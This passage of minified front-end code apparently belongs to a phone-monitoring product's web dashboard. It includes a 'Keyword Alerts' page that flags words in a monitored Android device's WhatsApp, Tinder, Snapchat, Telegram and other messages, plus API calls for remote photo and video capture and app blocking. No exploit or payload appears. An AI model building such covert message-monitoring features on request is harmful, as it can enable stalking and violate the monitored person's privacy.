(self["webpackChunk_N_E"] = self["webpackChunk_N_E"] || []).push([[2822],{

/***/ 92750:
/***/ (function(__unused_webpack_module, __unused_webpack_exports, __webpack_require__) {


    (window.__NEXT_P = window.__NEXT_P || []).push([
      "/android/local/keyword-alerts",
      function () {
        return __webpack_require__(27581);
      }
    ]);
    if(false) {}
  

/***/ }),

/***/ 19630:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export */ __webpack_require__.d(__webpack_exports__, {
/* harmony export */   "Cq": function() { return /* binding */ getCode; },
/* harmony export */   "DF": function() { return /* binding */ androidLocalRefresh; },
/* harmony export */   "LW": function() { return /* binding */ localShooting; },
/* harmony export */   "UC": function() { return /* binding */ localPhoneSendEmailios; },
/* harmony export */   "ds": function() { return /* binding */ CheckCode; },
/* harmony export */   "gM": function() { return /* binding */ checkAppLastVersion; },
/* harmony export */   "lm": function() { return /* binding */ localPhoneSendEmailandroid; },
/* harmony export */   "sk": function() { return /* binding */ setBlock; },
/* harmony export */   "zW": function() { return /* binding */ androidLocalRecordQuestionRrecycleGet; }
/* harmony export */ });
/* unused harmony exports localPhoneSendEmail, androidLocalAsyncDataStatus */
/* harmony import */ var _src_utils_request__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(93103);
/* harmony import */ var qs__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(80129);
/* harmony import */ var qs__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(qs__WEBPACK_IMPORTED_MODULE_1__);


//apk注册码
const getCode = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/user/get-device-code", options);
//apk验证注册码是否绑定
const CheckCode = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/user/check-device-code", options);
// 判断本地app是否最新版本
const checkAppLastVersion = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/get-app/version?" + qs__WEBPACK_IMPORTED_MODULE_1___default().stringify(options));
// 本地app请求刷新
const androidLocalRefresh = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/device/android-local-reset-data", options);
// 本地app录制状态获取
const androidLocalRecordQuestionRrecycleGet = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/device/android-local-record-question-recycle-get?" + qs__WEBPACK_IMPORTED_MODULE_1___default().stringify(options));
//AndRoid-Local选择moto机型时发送邮件
const localPhoneSendEmail = (options)=>axios.post("/api/definition/target-phone", options);
const localPhoneSendEmailios = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/definition/target-ios-phone", options);
const localPhoneSendEmailandroid = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/definition/target-android-phone", options);
//Block app && Block wifi获取应用解锁状态
const setBlock = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/device/android-local-device-type-limit", options);
//take photos && record video轮训消息
const localShooting = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/a-local-shooting-log", {
        params: options
    });
// apk同步下载数据轮询状态
const androidLocalAsyncDataStatus = (options)=>axios.post("/api/device/android-local-async-data-status", options);


/***/ }),

/***/ 74743:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(25675);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(next_image__WEBPACK_IMPORTED_MODULE_1__);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(61906);
/* harmony import */ var _ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(74249);
/* harmony import */ var _ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default = /*#__PURE__*/__webpack_require__.n(_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3__);




const ContentLoading = (param)=>{
    let { label , fullScreen =false , className =""  } = param;
    const { t  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_2__/* .useTranslation */ .$G)("common");
    const text = label || t("Loading...");
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
        role: "status",
        "aria-live": "polite",
        "aria-label": text,
        className: "".concat((_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingRoot), " ").concat(fullScreen ? (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingRootFullScreen) : "", " ").concat(className).trim(),
        children: [
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_1___default()), {
                src: "/images/loading/spinner.svg",
                alt: "",
                width: 64,
                height: 64,
                className: (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingSpinner),
                "aria-hidden": "true",
                priority: true
            }),
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                className: (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingLabel),
                children: text
            })
        ]
    });
};
/* harmony default export */ __webpack_exports__["Z"] = (ContentLoading);


/***/ }),

/***/ 76039:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export */ __webpack_require__.d(__webpack_exports__, {
/* harmony export */   "v": function() { return /* binding */ useAndroidDevicePagedData; }
/* harmony export */ });
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(67294);
/* harmony import */ var src_api_dashboard__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(95629);
/* harmony import */ var src_hooks_useDeviceScopedInit__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(82017);
/* harmony import */ var src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(26771);




/** INSTALLED_APP 按包名去重，兼容 bundleid / bundleId */ function getAppBundleId(item) {
    return (item === null || item === void 0 ? void 0 : item.bundleid) || (item === null || item === void 0 ? void 0 : item.bundleId) || "";
}
function dedupeInstalledApps(items) {
    const seen = new Set();
    const result = [];
    for (const item of items){
        const key = getAppBundleId(item);
        if (key) {
            if (seen.has(key)) continue;
            seen.add(key);
        }
        result.push(item);
    }
    return result;
}
/**
 * Android Cloud / Local 分页列表 Hook，设备切换时重置分页并取消旧请求。
 *
 * @param {Object} options
 * @param {'local'|'cloud'} options.source - 数据源：Local 或 Gcloud
 * @param {string} options.category - 接口 category 参数
 * @param {number} options.limit - 每页条数
 * @returns {{ context: Object|null, data: Array, loading: boolean, total: number, loadNext: Function, reload: Function, setDateRange: Function }}
 */ function useAndroidDevicePagedData(param) {
    let { source , category , limit  } = param;
    const [data, setData] = (0,react__WEBPACK_IMPORTED_MODULE_0__.useState)([]);
    const [loading, setLoading] = (0,react__WEBPACK_IMPORTED_MODULE_0__.useState)(true);
    const [total, setTotal] = (0,react__WEBPACK_IMPORTED_MODULE_0__.useState)(0);
    const [context, setContext] = (0,react__WEBPACK_IMPORTED_MODULE_0__.useState)(null);
    const scopeRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(null);
    const revisionRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(0);
    const pageRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)({
        offset: 0,
        maxNum: false,
        loading: false
    });
    /** @type {React.MutableRefObject<{ startTime: number, endTime: number } | null>} 日期筛选区间（毫秒） */ const dateRangeRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(null);
    const loadPage = (0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)(async function(offset) {
        let scope = arguments.length > 1 && arguments[1] !== void 0 ? arguments[1] : scopeRef.current, revision = arguments.length > 2 && arguments[2] !== void 0 ? arguments[2] : revisionRef.current;
        if (!scope || pageRef.current.loading || pageRef.current.maxNum) return;
        pageRef.current.loading = true;
        const { context: scopedContext , signal , isCurrent  } = scope;
        const request = source === "local" ? src_api_dashboard__WEBPACK_IMPORTED_MODULE_1__/* .getLocalAndroidAll */ .gH : src_api_dashboard__WEBPACK_IMPORTED_MODULE_1__/* .getGcloudAll */ .U1;
        const params = {
            category,
            offset,
            limit
        };
        if (source === "local") params.deviceUdid = (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_3__/* .readLocalDeviceUdid */ .S)(scopedContext);
        if (source === "cloud" && (scopedContext === null || scopedContext === void 0 ? void 0 : scopedContext.physicalDeviceKey)) {
            params.deviceUdid = scopedContext.physicalDeviceKey;
        }
        // 日期筛选走接口：不筛选时不传，请求与改动前一致
        const range = dateRangeRef.current;
        if (range) {
            if (range.startTime != null) params.startTime = range.startTime;
            if (range.endTime != null) params.endTime = range.endTime;
        }
        try {
            var ref;
            const response = await request({
                username: source === "local" ? (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_3__/* .readUserEmail */ .t)() : (scopedContext === null || scopedContext === void 0 ? void 0 : scopedContext.username) || "",
                params
            }, {
                signal
            });
            if (!isCurrent() || revision !== revisionRef.current) return;
            const contents = response === null || response === void 0 ? void 0 : (ref = response.data) === null || ref === void 0 ? void 0 : ref.contents;
            if (contents) {
                setData((old)=>{
                    const merged = offset === 0 ? [
                        ...contents
                    ] : [
                        ...old,
                        ...contents
                    ];
                    return category === "INSTALLED_APP" ? dedupeInstalledApps(merged) : merged;
                });
                setTotal(response.data.totalCount || 0);
                pageRef.current.offset = offset;
                if (contents.length < limit) pageRef.current.maxNum = true;
            } else {
                pageRef.current.maxNum = true;
            }
            setLoading(false);
        } catch (error) {
            if (isCurrent() && revision === revisionRef.current && (error === null || error === void 0 ? void 0 : error.code) !== "ERR_CANCELED") {
                ;
                setLoading(false);
            }
        } finally{
            if (isCurrent() && revision === revisionRef.current) pageRef.current.loading = false;
        }
    }, [
        category,
        limit,
        source
    ]);
    // 设备切换：重置分页 state 并从第一页重新请求
    (0,src_hooks_useDeviceScopedInit__WEBPACK_IMPORTED_MODULE_2__/* .useDeviceScopedInit */ .A)((0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)((_, scope)=>{
        scopeRef.current = scope;
        revisionRef.current += 1;
        dateRangeRef.current = null;
        pageRef.current = {
            offset: 0,
            maxNum: false,
            loading: false
        };
        setData([]);
        setLoading(true);
        setTotal(0);
        setContext(scope.context);
        loadPage(0, scope, revisionRef.current);
    }, [
        loadPage
    ]));
    const loadNext = (0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)(()=>{
        const page = pageRef.current;
        if (!page.maxNum && !page.loading) loadPage(page.offset + limit);
    }, [
        limit,
        loadPage
    ]);
    const reload = (0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)(()=>{
        const scope = scopeRef.current;
        if (!scope) return;
        revisionRef.current += 1;
        pageRef.current = {
            offset: 0,
            maxNum: false,
            loading: false
        };
        setData([]);
        setLoading(true);
        setTotal(0);
        loadPage(0, scope, revisionRef.current);
    }, [
        loadPage
    ]);
    /**
   * 设置日期筛选区间并重新从第一页拉取（区间由接口过滤，不是本地过滤）。
   * @param {{ startTime: number, endTime: number } | null} range - 毫秒时间戳；null 表示清除筛选
   */ const setDateRange = (0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)((range)=>{
        dateRangeRef.current = range;
        reload();
    }, [
        reload
    ]);
    return {
        context,
        data,
        loading,
        total,
        loadNext,
        reload,
        setDateRange
    };
}


/***/ }),

/***/ 82017:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export */ __webpack_require__.d(__webpack_exports__, {
/* harmony export */   "A": function() { return /* binding */ useDeviceScopedInit; }
/* harmony export */ });
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(67294);
/* harmony import */ var react_redux__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(9473);
/* harmony import */ var src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(34745);



/**

 * 当前选中设备变化时重新执行初始化逻辑（拉数、重置本地 state 等）。

 * 通过 requestKey 与 AbortSignal 丢弃切换前未完成的异步请求。

 *

 * @param {(deviceUser: string, scope: {

 *   context: Object,

 *   signal: AbortSignal,

 *   isCurrent: () => boolean

 * }) => void} initFn - 设备作用域初始化回调，需 useCallback 包裹

 */ function useDeviceScopedInit(initFn) {
    const deviceUser = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)((state)=>state.Common.deviceUser);
    const context = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)(src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__/* .selectDeviceContext */ .VQ);
    const requestKey = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)(src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__/* .selectDeviceRequestKey */ .rx);
    const contextRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(context);
    contextRef.current = context;
    const effectiveDeviceUser = deviceUser || (context === null || context === void 0 ? void 0 : context.accountId) || (context === null || context === void 0 ? void 0 : context.username);
    (0,react__WEBPACK_IMPORTED_MODULE_0__.useEffect)(()=>{
        if (!effectiveDeviceUser) return;
        const controller = new AbortController();
        let active = true;
        const scopedContext = contextRef.current;
        // 仅当 requestKey 仍与当前 Redux 一致时，才应用异步结果
        const isCurrent = ()=>{
            var ref;
            return active && !controller.signal.aborted && ((ref = contextRef.current) === null || ref === void 0 ? void 0 : ref.requestKey) === requestKey;
        };
        initFn(effectiveDeviceUser, {
            context: scopedContext,
            signal: controller.signal,
            isCurrent
        });
        return ()=>{
            active = false;
            controller.abort();
        };
    }, [
        effectiveDeviceUser,
        initFn,
        requestKey
    ]);
}


/***/ }),

/***/ 27581:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
__webpack_require__.r(__webpack_exports__);
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(67294);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(25675);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_2___default = /*#__PURE__*/__webpack_require__.n(next_image__WEBPACK_IMPORTED_MODULE_2__);
/* harmony import */ var dayjs__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(27484);
/* harmony import */ var dayjs__WEBPACK_IMPORTED_MODULE_3___default = /*#__PURE__*/__webpack_require__.n(dayjs__WEBPACK_IMPORTED_MODULE_3__);
/* harmony import */ var _mui_material__WEBPACK_IMPORTED_MODULE_12__ = __webpack_require__(90948);
/* harmony import */ var next_router__WEBPACK_IMPORTED_MODULE_4__ = __webpack_require__(11163);
/* harmony import */ var next_router__WEBPACK_IMPORTED_MODULE_4___default = /*#__PURE__*/__webpack_require__.n(next_router__WEBPACK_IMPORTED_MODULE_4__);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_5__ = __webpack_require__(61906);
/* harmony import */ var src_hooks_useAndroidDevicePagedData__WEBPACK_IMPORTED_MODULE_6__ = __webpack_require__(76039);
/* harmony import */ var src_hooks_useDeviceScopedInit__WEBPACK_IMPORTED_MODULE_7__ = __webpack_require__(82017);
/* harmony import */ var src_api_android__WEBPACK_IMPORTED_MODULE_8__ = __webpack_require__(19630);
/* harmony import */ var react_redux__WEBPACK_IMPORTED_MODULE_9__ = __webpack_require__(9473);
/* harmony import */ var src_store_apps_Common__WEBPACK_IMPORTED_MODULE_10__ = __webpack_require__(34745);
/* harmony import */ var src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_11__ = __webpack_require__(74743);













// 自定义隐藏滚动条且保留滚动特性(div
const ScrollDiv = (0,_mui_material__WEBPACK_IMPORTED_MODULE_12__/* ["default"] */ .ZP)("div")({
    "@media (max-width: 600px)": {
        "-msOverflowStyle": "none",
        /* 适用于 IE 和 Edge */ scrollbarWidth: "none",
        /* 适用于 Firefox */ "&::-webkit-scrollbar": {
            display: "none"
        }
    }
});
// 自定义隐藏滚动条且保留滚动特性(ul
const ScrollUl = (0,_mui_material__WEBPACK_IMPORTED_MODULE_12__/* ["default"] */ .ZP)("ul")({
    "-msOverflowStyle": "none",
    /* 适用于 IE 和 Edge */ scrollbarWidth: "none",
    /* 适用于 Firefox */ "&::-webkit-scrollbar": {
        display: "none"
    }
});
// 自定义滚动条(ul
const ScrollUlShow = (0,_mui_material__WEBPACK_IMPORTED_MODULE_12__/* ["default"] */ .ZP)("ul")({
    "-msOverflowStyle": "none",
    /* 适用于 IE 和 Edge */ scrollbarWidth: "thin",
    /* 适用于 Firefox，设置滚动条为细 */ "&::-webkit-scrollbar": {
        width: "4px"
    },
    "&::-webkit-scrollbar-thumb": {
        backgroundColor: "#888",
        /* 设置滚动条滑块的颜色 */ borderRadius: "10px"
    },
    "&::-webkit-scrollbar-track": {
        backgroundColor: "#f1f1f1"
    },
    "@media (max-width: 600px)": {
        "-msOverflowStyle": "none",
        /* 适用于 IE 和 Edge */ scrollbarWidth: "none",
        /* 适用于 Firefox */ "&::-webkit-scrollbar": {
            display: "none"
        }
    }
});
const KeywordAlerts = (param)=>{
    let {} = param;
    const { t , locale  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_5__/* .useTranslation */ .$G)("common");
    const dispatch = (0,react_redux__WEBPACK_IMPORTED_MODULE_9__/* .useDispatch */ .I0)();
    const dictionaries = {
        selectFeatures: {
            list: [
                {
                    key: "All"
                },
                {
                    key: "Badoo"
                },
                {
                    key: "Facebook"
                },
                {
                    key: "Facebook Lite"
                },
                {
                    key: "Facebook Messenger"
                },
                {
                    key: "Facebook Messenger Lite"
                },
                {
                    key: "WhatsApp"
                },
                {
                    key: "LINE"
                },
                {
                    key: "Messages"
                },
                {
                    key: "Snapchat"
                },
                {
                    key: "Telegram"
                },
                {
                    key: "Instagram"
                },
                {
                    key: "Tinder"
                },
                {
                    key: "Discord"
                },
                {
                    key: "Hangouts"
                },
                {
                    key: "TikTok"
                },
                {
                    key: "Kik"
                },
                {
                    key: "QQ"
                },
                {
                    key: "Skype"
                },
                {
                    key: "Tumblr"
                },
                {
                    key: "Viber"
                },
                {
                    key: "WeChat"
                },
                {
                    key: "Chrome"
                }
            ]
        },
        notificationType: {
            list: [
                {
                    key: t("Notify to email")
                },
                {
                    key: t("Do not notify")
                }
            ]
        }
    };
    const [showLeftData, setShowLeftData] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)([]) // Tracking Rules显示的数据
    ;
    const [nowPage, setNowPage] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(0) // 当前选中的页
    ;
    const [wordValue, setWordValue] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)("") // 当前输入的Word or Phrase值
    ;
    const [wordFlag, setWordFlag] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(0) // 是否输入Word or Phrase值
    ;
    const [activeFeatures, setActiveFeatures] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 是否展开Select Features下拉框
    ;
    const [featureValue, setFeatureValue] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(dictionaries.selectFeatures.list[0].key) // 当前选择的Select Features值
    ;
    const [activeNotify, setActiveNotify] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 是否展开Notification Type下拉框
    ;
    const [notifyValue, setNotifyValue] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(dictionaries.notificationType.list[0].key) // 当前选择的Notification Type值
    ;
    const { context , data: showRightData , loading: isLoading , loadNext  } = (0,src_hooks_useAndroidDevicePagedData__WEBPACK_IMPORTED_MODULE_6__/* .useAndroidDevicePagedData */ .v)({
        source: "local",
        category: "MONITOR_KEYWORD",
        limit: 100
    });
    // 设备切换时重置关键词列表与筛选状态
    (0,src_hooks_useDeviceScopedInit__WEBPACK_IMPORTED_MODULE_7__/* .useDeviceScopedInit */ .A)((0,react__WEBPACK_IMPORTED_MODULE_1__.useCallback)(async (_, param)=>{
        let { context: scopedContext , isCurrent  } = param;
        var ref;
        setShowLeftData([]);
        setNowPage(0);
        setWordValue("");
        setWordFlag(0);
        setActiveFeatures(false);
        setActiveNotify(false);
        const result = await (0,src_api_android__WEBPACK_IMPORTED_MODULE_8__/* .setBlock */ .sk)({
            device_id: (scopedContext === null || scopedContext === void 0 ? void 0 : scopedContext.username) || ""
        });
        if (isCurrent()) setShowLeftData((result === null || result === void 0 ? void 0 : (ref = result.data) === null || ref === void 0 ? void 0 : ref.keyword) || []);
    }, []));
    const Delete = async (param)=>{
        let { feature , text  } = param;
        var ref;
        const deviceId = (context === null || context === void 0 ? void 0 : context.username) || "";
        const result = await (0,src_api_android__WEBPACK_IMPORTED_MODULE_8__/* .setBlock */ .sk)({
            device_id: deviceId,
            type: "keyword",
            name: {
                feature,
                text
            },
            action: false
        });
        await (0,src_api_android__WEBPACK_IMPORTED_MODULE_8__/* .androidLocalRefresh */ .DF)({
            device_id: deviceId,
            type: 49,
            text,
            feature,
            limit: false
        });
        setShowLeftData((result === null || result === void 0 ? void 0 : (ref = result.data) === null || ref === void 0 ? void 0 : ref.keyword) || []);
    };
    const addData = async ()=>{
        const exists = showLeftData === null || showLeftData === void 0 ? void 0 : showLeftData.some((item)=>item.feature === featureValue && item.text === wordValue);
        if (!exists) {
            var ref;
            const deviceId = (context === null || context === void 0 ? void 0 : context.username) || "";
            const result = await (0,src_api_android__WEBPACK_IMPORTED_MODULE_8__/* .setBlock */ .sk)({
                device_id: deviceId,
                type: "keyword",
                name: {
                    feature: featureValue,
                    text: wordValue
                },
                action: true
            });
            await (0,src_api_android__WEBPACK_IMPORTED_MODULE_8__/* .androidLocalRefresh */ .DF)({
                device_id: deviceId,
                type: 49,
                text: wordValue,
                feature: featureValue,
                limit: true
            });
            setShowLeftData((result === null || result === void 0 ? void 0 : (ref = result.data) === null || ref === void 0 ? void 0 : ref.keyword) || []);
        }
    };
    const leftDom = (0,react__WEBPACK_IMPORTED_MODULE_1__.useRef)(null);
    const rightDom = (0,react__WEBPACK_IMPORTED_MODULE_1__.useRef)(null);
    // 滚动百分比
    const [scroll, setScroll] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(0);
    // 获取滚动百分比
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        const handScroll = ()=>{
            if (rightDom.current) {
                const { scrollTop , scrollHeight , clientHeight  } = rightDom.current;
                const progress = scrollTop / (scrollHeight - clientHeight) * 100;
                setScroll(progress.toFixed(0));
            }
        };
        const currentRef = rightDom.current;
        if (currentRef) {
            currentRef.addEventListener("scroll", handScroll);
        }
        return ()=>{
            if (currentRef) {
                currentRef.removeEventListener("scroll", handScroll);
            }
        };
    }, []);
    // 监听滚动百分比
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        if (scroll >= 100) loadNext();
    }, [
        loadNext,
        scroll
    ]);
    // 获取当前语种的dayjs
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        const handleLocale = async ()=>{
            switch(locale){
                case "fr":
                    await __webpack_require__.e(/* import() */ 6023).then(__webpack_require__.t.bind(__webpack_require__, 96023, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("fr");
                    break;
                case "jp":
                    await __webpack_require__.e(/* import() */ 6831).then(__webpack_require__.t.bind(__webpack_require__, 76831, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("ja");
                    break;
                case "es":
                    await __webpack_require__.e(/* import() */ 7763).then(__webpack_require__.t.bind(__webpack_require__, 91844, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("es");
                    break;
                case "de":
                    await __webpack_require__.e(/* import() */ 790).then(__webpack_require__.t.bind(__webpack_require__, 80790, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("de");
                    break;
                case "it-ch":
                    await __webpack_require__.e(/* import() */ 5551).then(__webpack_require__.t.bind(__webpack_require__, 15551, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("it");
                    break;
                case "pt":
                    await __webpack_require__.e(/* import() */ 5001).then(__webpack_require__.t.bind(__webpack_require__, 15001, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("pt");
                    break;
                case "kr":
                    await __webpack_require__.e(/* import() */ 9132).then(__webpack_require__.t.bind(__webpack_require__, 19132, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("ko");
                    break;
                case "tr":
                    await __webpack_require__.e(/* import() */ 3035).then(__webpack_require__.t.bind(__webpack_require__, 73035, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("tr");
                    break;
                case "ar":
                    await __webpack_require__.e(/* import() */ 3939).then(__webpack_require__.t.bind(__webpack_require__, 63939, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("ar");
                    break;
                case "tw":
                    await __webpack_require__.e(/* import() */ 3901).then(__webpack_require__.t.bind(__webpack_require__, 43901, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("zh-tw");
                    break;
                case "ru":
                    await __webpack_require__.e(/* import() */ 600).then(__webpack_require__.t.bind(__webpack_require__, 70600, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("ru");
                    break;
                case "nl":
                    await __webpack_require__.e(/* import() */ 9182).then(__webpack_require__.t.bind(__webpack_require__, 99182, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("nl");
                    break;
                case "pl":
                    await __webpack_require__.e(/* import() */ 1987).then(__webpack_require__.t.bind(__webpack_require__, 81987, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("pl");
                    break;
                case "sv":
                    await __webpack_require__.e(/* import() */ 1876).then(__webpack_require__.t.bind(__webpack_require__, 91876, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("sv");
                    break;
                default:
                    await __webpack_require__.e(/* import() */ 5054).then(__webpack_require__.t.bind(__webpack_require__, 25054, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_3___default().locale("en");
            }
        };
        handleLocale();
    }, [
        locale
    ]);
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        const title = t("Keyword Alerts");
        dispatch((0,src_store_apps_Common__WEBPACK_IMPORTED_MODULE_10__/* .setCurrentTab */ .Lw)(title));
        return ()=>dispatch((0,src_store_apps_Common__WEBPACK_IMPORTED_MODULE_10__/* .setCurrentTab */ .Lw)(""));
    }, [
        dispatch,
        t
    ]);
    // 埋点上报
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        if ((showLeftData === null || showLeftData === void 0 ? void 0 : showLeftData.length) === 0 && (showRightData === null || showRightData === void 0 ? void 0 : showRightData.length) === 0) return;
        if (Array.isArray(showLeftData) && (showLeftData === null || showLeftData === void 0 ? void 0 : showLeftData.length) > 0) {
            const events = showLeftData.map((item)=>{
                return {
                    event_name: "Info_Open_Web_Keywordalerts_Info",
                    properties: {
                        app: (item === null || item === void 0 ? void 0 : item.feature) || "",
                        text: (item === null || item === void 0 ? void 0 : item.text) || ""
                    }
                };
            });
        }
    // if (Array.isArray(showRightData) && showRightData.length > 0) {
    //   const events = showRightData.map(item => ({
    //     event_name: 'Info_Open_Web_Keywordalerts_Info',
    //     properties: {
    //       app: item?.feature || '',
    //       text: item?.text || '',
    //       time: item?.time || '',
    //     }
    //   }))
    // }
    }, [
        showLeftData,
        showRightData
    ]);
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(react__WEBPACK_IMPORTED_MODULE_1__.Fragment, {
        children: [
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                className: "w-full flex justify-center items-center mb-[24px]",
                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                    className: "w-max h-[42px] px-[2px] flex justify-between items-center bg-[#EAEAEA] rounded-[8px] text-[14px] text-[#000000] font-[Poppins] font-[600] leading-[21px] relative",
                    children: [
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                            className: "p-[8px_12px_9px_12px] ".concat(nowPage === 0 ? "font-[600] text-[#2405F2] bg-[#FFFFFF] rounded-[6px]" : "font-[400]", " cursor-pointer text-nowrap mr-[15px] relative z-10"),
                            onClick: ()=>setNowPage(0),
                            children: t("Tracking Rules")
                        }),
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                            className: "p-[8px_12px_9px_12px] ".concat(nowPage === 1 ? "font-[600] text-[#2405F2] bg-[#FFFFFF] rounded-[6px]" : "font-[400]", " cursor-pointer text-nowrap relative z-10"),
                            onClick: ()=>setNowPage(1),
                            children: t("Keywords Detected")
                        })
                    ]
                })
            }),
